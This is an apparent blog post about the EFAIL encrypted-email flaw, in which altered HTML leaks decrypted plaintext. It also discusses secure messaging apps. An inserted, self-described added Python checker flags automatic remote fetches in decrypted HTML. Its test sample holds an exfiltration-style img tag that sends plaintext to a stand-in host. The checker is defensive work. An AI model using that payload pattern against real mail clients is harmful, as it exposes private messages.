Stories are flying around this week about a vulnerability in encrypted email. It's always a good idea to check what Bruce Schneier has to say about any security issues. It seems this is an issue with how many email apps render the email after decryption. If an attacker can manipulate it in transit, they can add HTML that effectively sends the plaintext back to them. The sender cannot prevent this. You can't rely on every recipient doing their decryption on a command line.
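One check a mail client can make against the rendering problem described above, as an added example that is not from the original post: scan the decrypted HTML for anything the renderer would fetch automatically, and fall back to plain text if it finds any. The function names, the attribute list and the two sample messages are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Attributes that make a renderer fetch a URL without any click.
# Assumption: illustrative list, not an exhaustive one.
AUTO_FETCH_ATTRS = {"src", "srcset", "background", "poster", "data"}
REMOTE = re.compile(r"^\s*(https?:)?//", re.I)
CSS_REMOTE = re.compile(r"url\(\s*['\"]?\s*(https?:)?//", re.I)


class RemoteFetchFinder(HTMLParser):
    """Collects (tag, attribute, value) for every automatic remote fetch."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            auto = name in AUTO_FETCH_ATTRS or (tag == "link" and name == "href")
            if auto and REMOTE.match(value):
                self.findings.append((tag, name, value.strip()))
            elif name == "style" and CSS_REMOTE.search(value):
                self.findings.append((tag, name, value.strip()))


def remote_fetches(decrypted_html):
    finder = RemoteFetchFinder()
    finder.feed(decrypted_html)
    finder.close()
    return finder.findings


def render_mode(decrypted_html):
    # Any automatic remote fetch means the message is shown as plain text.
    return "plain-text" if remote_fetches(decrypted_html) else "html"


# Constructed samples: what the renderer sees after decryption.
CLEAN = '<p>Meet at <b>noon</b>. <a href="https://example.org/map">Map</a></p>'
TAMPERED = '<p>Hi</p><img src="http://collector.example/Meet%20at%20noon">'

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, render_mode(body), remote_fetches(body))
```

An ordinary link is not flagged because it needs a click; an image, stylesheet or CSS background is, because the request goes out as soon as the message is displayed.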
Every security risk needs a name these days and this one is christened EFAIL. Initial reports from the EFF were a little shrill, but they have a better piece now.
This is not an issue with the PGP/GPG encryption as the attacker still needs you to decrypt the message. I just wonder how many people used encrypted email anyway. I tried to use it years ago, but didn't know many people who were interested.
EFF and others are recommending we use apps like Signal that do end-to-end encryption. I've not used that yet. I do use Keybase and have linked up with a few Steemians on there. Some of these apps are fairly technical and you have to be aware of what actions can put your security at risk. For most things, apps like WhatsApp may be secure enough.
I do wonder how much younger people use email. You need an account to register for most things, but then they may just use social apps. The problem is the fragmentation of communications. I'm not always sure what app to use to reach certain people.
No system is 100% secure. There's always human error.
Don't have nightmares.